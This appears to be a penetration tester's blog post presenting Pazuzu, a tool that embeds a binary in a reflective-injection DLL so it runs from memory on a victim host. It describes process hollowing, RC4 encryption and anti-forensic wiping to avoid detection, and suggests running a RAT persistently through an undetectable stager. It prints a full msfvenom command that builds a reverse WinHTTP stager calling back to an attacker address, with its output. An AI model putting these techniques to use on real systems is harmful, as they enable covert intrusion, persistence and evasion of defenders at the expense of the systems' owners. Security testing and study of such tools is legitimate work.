Pazuzu: reflective DLL to run binaries from memory

Most of the times I use Meterpreter in my pentest but sometimes I missed the possibility to run my own binaries from memory to carry out very specific tasks. In this type of scenario I needed a way to run a binary (a simple C application) on the victim host making as little noise as possible (so payloads like download_exe were not an option). To get this I wrote a tiny tool called Pazuzu I would like to share (currently an alpha release with ugly code; no types or macros, etc).

Pazuzu is a Python script that allows you to embed a binary within a precompiled DLL which uses reflective DLL injection. The goal is that you can run your own binary directly from memory.

To run the payload,  you just have to choose the stager you like (reverse TCP, HTTP, HTTPS, etc.) and set the DLL generated by Pazuzu. Pazuzu will execute the binary within the address space of the vulnerable process as long as it has the .reloc section.

The idea is not new, I've just put together two techniques (reflective dll injection and some PE injection technique) to get my binary to be run from memory. Why is this useful? This is great in some situations, for example, If you want to run your own RAT (exe) whenever a computer restart you can use a stager to retrieve it and run it from memory, so you don’t need to worry about the persistence mechanism in your binary. Only it is necessary to devote all efforts to make the stager persistent and FUD. So if you have done your own payload in a .exe format and want to run it from memory this could be a good solution. Anoter option, of course, is to recompile your code applying the Stephen Fewer injection technique.

How-to

• The script Pazuzu.py accepts as input the binary you want to run from memory (parameter -f). Depending on the properties of the binary Pazuzu will choose one of the 3 DLL currently available. These DLL are:

1. reloc­x86.dll: lets you run the binary inside the address space of the process. This option is the most favorable since the binary generates less "noise" in the system.
2. dforking­x86.dll: the binary in this case also runs from memory but using "process hollowing". This technique is the one used by the "execute" command with the -m flag in Meterpreter.
3. download­86.dll: this is the noisiest option since the binary will be downloaded and executed from disk.

• Pazuzu also provides some additional features. For example, the -x option will encrypt the section containing the binary by using a random RC4 key (which is stored in the DLL TimeStamp). In addition, after running it the PE header of the DLL and the binary section will be overwritten with zeros. I will add more anti-forensic techniques in future versions.

• With the -p option the resulting DLL will be patched with the bootstrap required to reach the export “ReflectiveLoader” (more info here). This option is useful to not depend on the Metasploit handler to inject the DLL. That is, if the DLL is already patched we can upload it to a Web server so that the stager could retrieve it from there (more anonymity).

Restrictions

• Not all binaries can be run from memory. For example, applications which require .NET CLR (managed code) won't be run. I will try to implement this in an upcoming version. By now you can download and run .NET application from disk with the -d option (noisy option).
• If .reloc section is not present the script will use a "process hollowing" approach.
• Support for 32-bit for now.

Examples

To get the Pazuzu DLL I will use a WinHTTP stager:

root@kali:~# msfvenom -p windows/dllinject/reverse_winhttp lhost=192.168.1.44 lport=8080 dll=. -f exe -o Winhttp-stager.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 908 bytes
Saved as: Winhttp-stager.exe

Let's run Pazuzu.py with the regshot.exe binary (.reloc section present):

Let's run it now with the verbose option to see more detailed information:

In the next example I use putty.exe which has no reloc section. I have chosen the system binary "c:\windows\write.exe" (option -k) to be "hollowed out" and I have encrypted the binary section with RC4 (option -x). The hidden option -m just run msfvenom with a winhttp dllinject stager.

Here the Process Explorer output:

Here I leave a video with some examples: